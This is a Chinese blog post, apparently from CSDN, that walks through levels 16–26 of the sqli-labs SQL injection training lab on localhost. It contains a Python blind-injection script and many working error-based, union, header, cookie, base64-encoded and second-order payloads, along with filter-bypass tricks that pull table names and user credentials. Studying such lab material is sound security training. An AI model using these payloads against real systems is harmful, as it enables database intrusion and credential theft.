sql注入——sqlilabs16-26

已于 2024-08-09 21:52:47 修改
阅读量679 收藏 9
点赞数 7
分类专栏: 渗透 文章标签: sql 数据库
于 2024-08-09 21:51:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aimnr/article/details/141059709
版权

文章目录

less-16

在这里插入图片描述

  • 发现和less15差不多,就闭合变为了”)

3.注入

import requests

url  = "http://localhost/sqlilabs/Less-16/"
def get_database(url, yuju, chishu):
    name = ''
    for i in range(1, chishu):
        minr = 32
        maxr = 129
        middle = (minr + maxr) // 2
        while minr < maxr :
            data = {"uname": 'admin") and ascii(substr((%s), %d, 1)) > %d -- ' % (yuju, i, middle), "passwd": "asdfadff"}
            request = requests.post(url, data=data)
            if "flag.jpg" in request.text:
                minr = middle + 1
                # print(True)
            else:
                # print(False)
                maxr = middle
            middle = (minr + maxr) // 2

            if maxr == 32:
                break
            # print(middle)
        name = name + chr(middle)
        print(name)

yuju = input("输入查询语句:")
chishu = int(input('大概查询次数:'))
get_database(url, yuju, chishu)

在这里插入图片描述

less-17

在这里插入图片描述
在这里插入图片描述

  • 这里呢我们发现uname用了过滤,passwd就没有
  • 从执行顺序上看发现想进入到注入语句,$row就得有数据,所以用户得存在,然后再passwd处下功夫,用报错注入试试

2.数据库名

1' and updatexml(1,concat(0x7e,(database()),0x7e),1)-- 
1' and (select 1 from (select count(*), concat(database(), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) -- //floor 报错注入

在这里插入图片描述

2.1 floor报错注入数据库名
1' and (select 1 from (select count(*), concat(database(), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) -- //floor 报错注入

在这里插入图片描述

3.查到数据表

1'and updatexml(1, concat(0x7e,(select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'),0x7e),1)--

在这里插入图片描述

3.1floor 报错注入数据表
1' and (select 1 from (select count(*), concat((select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) --

在这里插入图片描述

4.查取列名

1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),0x7e),1)--

在这里插入图片描述

4.1 floor报错注入 列名
1' and (select 1 from (select count(*), concat((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) -- //floor 报错注入

在这里插入图片描述

5.查取内容

1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1)--

  • 很明显这里并没有注入出来,

  • 这里报错的意思(你不能在查询user表时,更改表中的数据在同一语句中) 因为这里的注入点时update语句

  • 我们这里语句拼接好:

    • update users set password = '1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) //这里明显有一个查user表的语句

在这里插入图片描述

1' and updatexml(1,substr(concat(0x7e,(select t.name from (select group_concat(username, 0x3a, password) as name from users ) as t),0x7e),1,32),1)--  //这里修改为创建一个新表,新表的内容为users表的内容,在查询新表

在这里插入图片描述

less-18

在这里插入图片描述

  • 这里我们看到uname,passwd都有被过滤,但是他对响应信息有一个入库的操作,这里我们可以试试

  • HTPP_USER_AGENT:user_agent REMOTE_ADDR:X-Forwarded-For

  • 用burp suite进行抓包,然后发送到重发部模块
    在这里插入图片描述
    在这里插入图片描述

1.添加X-Forwarded-For测试

  • 这里呢我们不用逃逸单引号,因为insert语句这后面需要构造,为了不必要的构造,我们
X-Forwarded-For:1' and updatexml(1, concat(0x7e, (database()), 0x7e), 1) 'and '1'='1
  • 没有什么用
    在这里插入图片描述

2修改User-Agent测试

1' and updatexml(1, concat(0x7e, (database()), 0x7e), 1) and '1'='1

在这里插入图片描述

3.查数据表名

1' and updatexml(1, concat(0x7e, (select  group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), 0x7e), 1) and '1'='1

1' and (select 1 from (select count(*), concat((select group_concat(table_name) from information_schema.columns where table_schema = 'security'), floor(rand(0) * 2)) as x from information_schema.columns group by x) as z )and '1'='1

在这里插入图片描述

4.查数据列

1' and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), 0x7e), 1) and '1'='1

1' and (select 1 from (select count(*), concat((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) and '1'='1

在这里插入图片描述

5.查取数据

1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) and '1'='1

在这里插入图片描述

less-19

在这里插入图片描述

在这里插入图片描述

  • 这里和less-18差不多就是注入点为referer

在这里插入图片描述

2.查数据库

1' and updatexml(1, concat(0x7e, (database()), 0x7e), 1) and '1'='1

3.查数据表

1' and updatexml(1, concat(0x7e, (select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), 0x7e), 1) and '1'='1

4.查数据列

1' and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), 0x7e), 1) and '1'='1

5.查取数据

1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) and '1'='1

在这里插入图片描述

less-20

在这里插入图片描述

  • 这里呢只展示了二次提交时候的代码,在二次提交时才会有注入点

  • 完整流程大概就是,先判断你有没有cookie,没有就登录,登录通过后设置cookie的uname字段值为用户明,然后二次提交后,再回到这个页面,这次有cookie,就直接到了上面这段代码,发现二次提交时cookie可以改,没有过滤,然后有一个查表的动作,后面有报错语句,利用报错注入

  • 第一次提交
    在这里插入图片描述

  • 第二次提交

在这里插入图片描述

2.查数据库

1' and updatexml(1, concat(0x7e, (database()), 0x7e), 1) --+

在这里插入图片描述

3.查数据表

1' and updatexml(1, concat(0x7e, (select  group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), 0x7e), 1)--+

4.查数据列

1' and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), 0x7e), 1) --+

5.查取数据

1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) --+

在这里插入图片描述

less-21

在这里插入图片描述

在这里插入图片描述

  • 其实和less-20差不多,就多了个base64的编码解码,闭合改为了 ')

2.查数据库

1') and updatexml(1, concat(0x7e, (database()), 0x7e), 1) -- //末尾空格
编码后:MScpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChkYXRhYmFzZSgpKSwgMHg3ZSksIDEpLS0g

在这里插入图片描述

3.查数据表

1') and updatexml(1, concat(0x7e, (select  group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), 0x7e), 1)--  
MScpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChzZWxlY3QgZ3JvdXBfY29uY2F0KGRpc3RpbmN0IHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hID0gJ3NlY3VyaXR5JyksIDB4N2UpLCAxKS0tIA==

4.查数据列

1') and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), 0x7e), 1) -- 

MScpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgYW5kIHRhYmxlX25hbWUgPSAndXNlcnMnKSwgMHg3ZSksIDEpIC0tIA==

5.查取数据

1') and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) -- 

MScpIGFuZCB1cGRhdGV4bWwoMSxzdWJzdHIoY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUsMHgzYSxwYXNzd29yZCkgZnJvbSB1c2VycyksMHg3ZSksMSwzMiksMSkgLS0g

less-22

  • 其实和less-22差不多,就逃逸符号为双引号

2.查数据库

1" and updatexml(1, concat(0x7e, (database()), 0x7e), 1) -- //末尾空格
编码后:MSIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgKGRhdGFiYXNlKCkpLCAweDdlKSwgMSkgLS0g

3.查数据表

1" and updatexml(1, concat(0x7e, (select  group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), 0x7e), 1)--  

MSIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgKHNlbGVjdCAgZ3JvdXBfY29uY2F0KGRpc3RpbmN0IHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hID0gJ3NlY3VyaXR5JyksIDB4N2UpLCAxKS0tICA=

4.查数据列

1" and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), 0x7e), 1) -- 

MSIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hID0gJ3NlY3VyaXR5JyBhbmQgdGFibGVfbmFtZSA9ICd1c2VycycpLCAweDdlKSwgMSkgLS0g

5.查取数据

1" and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) -- 

MSIgYW5kIHVwZGF0ZXhtbCgxLHN1YnN0cihjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwweDNhLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwweDdlKSwxLDMyKSwxKSAtLSA=

less-23

在这里插入图片描述

  • 这里它把注释(–, #)符号过滤了。将它替换成了""
  • 所以我们不选择注释,改为闭合 -1’ union select 1,database(),'3
  • 拼接为:select * from users where id=’ -1’ union select 1, database(), '3’ limit 0,1;

2.查数据库

?id=-1' union select 1,database(),'3

在这里插入图片描述

3.查数据表

?id=-1' union select 1, 2, group_concat(distinct table_name) from information_schema.columns where table_schema = 'security

4.查数据列

?id=-1' union select 1, 2, group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users

5.查取数据

?id=-1' union select 1, (select group_concat(username,0x3a,password) from users), '3

less-24

在这里插入图片描述

  • 这个呢,注入点就是再创建用户的时候,可以用单引号和注释符,虽然单引号会被转意,但是写入库是会吧转义符去掉例如:(admin’#) 接收后(admin\‘#)写入数据库时(admin’#) ,取出时也是(admin’#)
  • 这时候我们改密码时候:我们用户虽然时admin’#,但是#在数据库时注释符,再上面截屏中的更新语句中实际上更新的是admin的用户
  • 所以我们可以通过admin用户登录

创建用户admin’#

在这里插入图片描述

修改admin’#的密码

在这里插入图片描述

在这里插入图片描述

我们admin的密码是admin,这里我们用登录admin用户,密码用1登陆试试

登陆成功

less-25

2.查数据库

?id=-1' union select 1, database(),1 --+

3.查看数据表

id=-1' union select 1, 2 , group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'--+

4.查看数据列

常见and or 绕过
大小写混杂绕过:anD,Or等
  • 这里失败了,因为它忽略大小写,无论带小写都会匹配上
?id=1' AnD '1'='1

复写绕过:anandd, oorr等

运算符绕过:|| (&&在url中会省略后面的参数)
?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema = 'security' anandd table_name = 'users'--+ 

?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema = 'security' && table_name = 'users'--+ 

?id=1' || '1'='2

url编码绕过 |:%7c &:%26
?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema = 'security' %26%26 table_name = 'users'--+

5.查数据

id=-1' union select 1,group_concat(username), group_concat(password) from users --+

less-26

  • 这里呢过滤了and or 忽略大小写:这点倒是可以过滤比如 编码 复写
  • 还有注释符-- #:通过闭合来绕过
  • 至于空格:可以用多行注释(/**/,用(),``来界定,或者其他字符代替
    • 在这里插入图片描述

2.查询数据库

?id=-1' || updataxml(1,concat(0x7e,database(),0x7e),1)oorr'1'='1

3.数据表

?id=-1' || updatexml(1,concat(0x7e,(select(group_concat(distinct `table_name`))from(infoorrmation_schema.columns)where `table_schema`='security'),0x7e),1)oorr'1'='1

4.数据列

id=1' || updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where `table_schema`='security'anandd`table_name`='users'),0x7e),1)anandd'1'='1

5.数据内容

?id=-1'||updatexml(1,substr(concat(0x7e,(select(group_concat(username,0x3a,passwoorrd))from(users)),0x7e),1,32),1)aandnd'1'='1
城南敢死队
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqli-labs-master.zip
03-17
SQL注入实战演练平台——SQL-labs学习指南》 SQL注入SQL Injection)是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL语句来控制或获取数据库中的敏感信息。SQL-labs是一个专为初学者设计的SQL注入...
sqli-labs-php7-master.zip
04-06
SQL注入攻防演练平台——sqli-labs-php7-master》 在网络安全领域,CTF(Capture The Flag)比赛是一种常见的技术竞技形式,它旨在提升参赛者的网络安全技能,特别是对于Web安全的理解。在这个背景下,"sqli-labs...
渗透测试SQL注入——Sqlilabs关卡详解
人若有志,就不会在半坡停止。
10-18 969
SQL注入sql注入点:url表单、搜索栏、动态网页(有参数提交的地方)、伪静态、请求头http的头部字段(user-agent、cookie、refer、x-forward-for)安全策略:先上waf 分类、 登录注入、 cms注入、article.php?id=、 数值型 、字符串型 Select * from tb where id=’ $id’ 、有回显 、无回显、 按注入的程度和顺序、 一阶注入 、二阶注入、 其他业务场景、延时盲注、布尔盲注。
048 SQL注入实验——sqli-labs-master,sqlmap自动化
鸡蛋炒鸡蛋
03-03 1559
文章目录一:sqli-labs-master的部署二:sqli注入通关2.1:笔记篇2.2:实操过程less-01less-02less-03less-04less-05less-06less-07less-08less-09三:sqlmap自动化注入 一:sqli-labs-master的部署 这里给到大家一个下载地址: sqli-labs-master (访问密码:zUw77A) 下载之后解压之后得到一个文件 把该文件夹放到已经安装好的phpstudy/www文件目录下 如何安装phpstudy,请参
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 813
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
SQL注入——sqli-labs-Less-9时间盲注
m0_63563528的博客
04-06 602
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同
SQL注入——sqli-labs第二十四关
lizhiiiii的博客
02-01 594
这一关我们使用二次注入,因为登录页面和注册页面都用了mysql_real_escape_string函数对于特殊字符转义。
SQL注入——sqli-labs第五关
lizhiiiii的博客
01-29 618
使用floor报错语句注入
sql注入——sqlilabs1-15
aimnr的博客
08-06 833
asdfasdfasf') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),0x7e),1)-- //末尾有空格。) 在其中放入可执行函数会被执行,ps:需要用()将其包裹如下。
SQL注入——sqli-labs-Less-9时间盲注_sqliless9,解析底层原理
2401_84433486的博客
04-17 798
测得第一列的名称的第一个字符是“i”,同样类推,得到第一列名为“id”,第二列“username”第三列“password”然后,第二个表名的第一位是“r”,依此类推得到第二个表名“referers”,第三个“uagens”,第四个“users”手注是可以注出来,但是相当费时间,我认为,手注更大的意义在于理解方法。(img-qkVA1lLi-1713365620107)]测得第一个表名的第一位是“e”,递推下去得到表名:emails。止,不再深入研究,那么很难做到真正的技术提升。下面尝试注users表。
SQL注入——sqli-labs(Less-2)
E-Malon的博客
06-02 222
本文章乃 “SQL 注入——sqli-labs(Less-X)” 系列文章之一,如果缺乏相应基础,建议从《SQL 注入——sqli-labs(Less-1)》开始看起。
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs-book
03-26
SQL注入实战演练指南——sqli-labs-book》 SQL注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意SQL代码来操纵数据库。本资源"**sqli-labs-book**"显然是一个关于SQL注入学习与实践...
sqli-labs-master靶机
10-12
SQL注入实验室(sqli-labs)详解】 SQL注入SQL Injection)是一种常见的网络安全漏洞,攻击者通过在Web应用程序的输入字段中注入恶意SQL代码,从而获取、修改、删除数据库中的敏感信息,甚至完全控制数据库...
SQL Server中CPU使用率过高的排查
主宰
08-05 308
如果sqlserver进程导致CPU使用率过高,则最常见的原因是执行表或索引扫描的查询,其次是排序、哈希操作和循环 (嵌套循环运算符或 WHILE (T-SQL) )。对于安装了sqlserver的服务器,可以先看下任务管理器中sqlserver对cpu的占用情况,确定是否是sqlserver导致cpu消耗过高。从输出中具有最高improvement_measure值的前5或10条建议开始。这些索引对性能有最显著的积极影响。使用以下查询检查是否缺少索引,并应用具有高改进度量值的任何建议索引。
SQL回顾
Wincreds的博客
08-05 450
②Cookie 是一种客户端的存储技术,用于在浏览器中存储少量数据。参数包含在请求体中,可以是键值对格式或其他格式,如 JSON。①Session 是一种服务器端的存储技术,用于在用户与网站的交互期间保持用户状态。会话数据通常存储在服务器上的文件或数据库中,可以永久存储用户信息,直到会话过期或被清除。会看到结果,正确密码,与其他的长度不一样,由于网站机制,防爬机制,这里我把密码从666改为了8,节约访问次数。旧密码无所谓,利用 admin’# ,进行修改,修改密码实际上修改的是admin的密码。
SQL Server 事务
最新发布
a876106354的博客
08-09 424
SQL Server 事务是数据库操作的一个基本特性,它允许你将一系列数据库操作组合成一个原子单元,这个单元中的所有操作要么全部成功,要么全部失败。事务具有以下四个重要的属性,通常被称为ACID属性。
[SWPUCTF 2021 新生赛]easy_sql
2301_80218721的博客
08-05 385
这个文章讲的东西基本可以够我去理解一些基本的思路和做法,然后文章里面还附带了一些基本的演示。然后我这里直接就是照着那个文章的思路去写的题目。转web之后第一次做sql,还不是很懂。然后就得到了flag。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值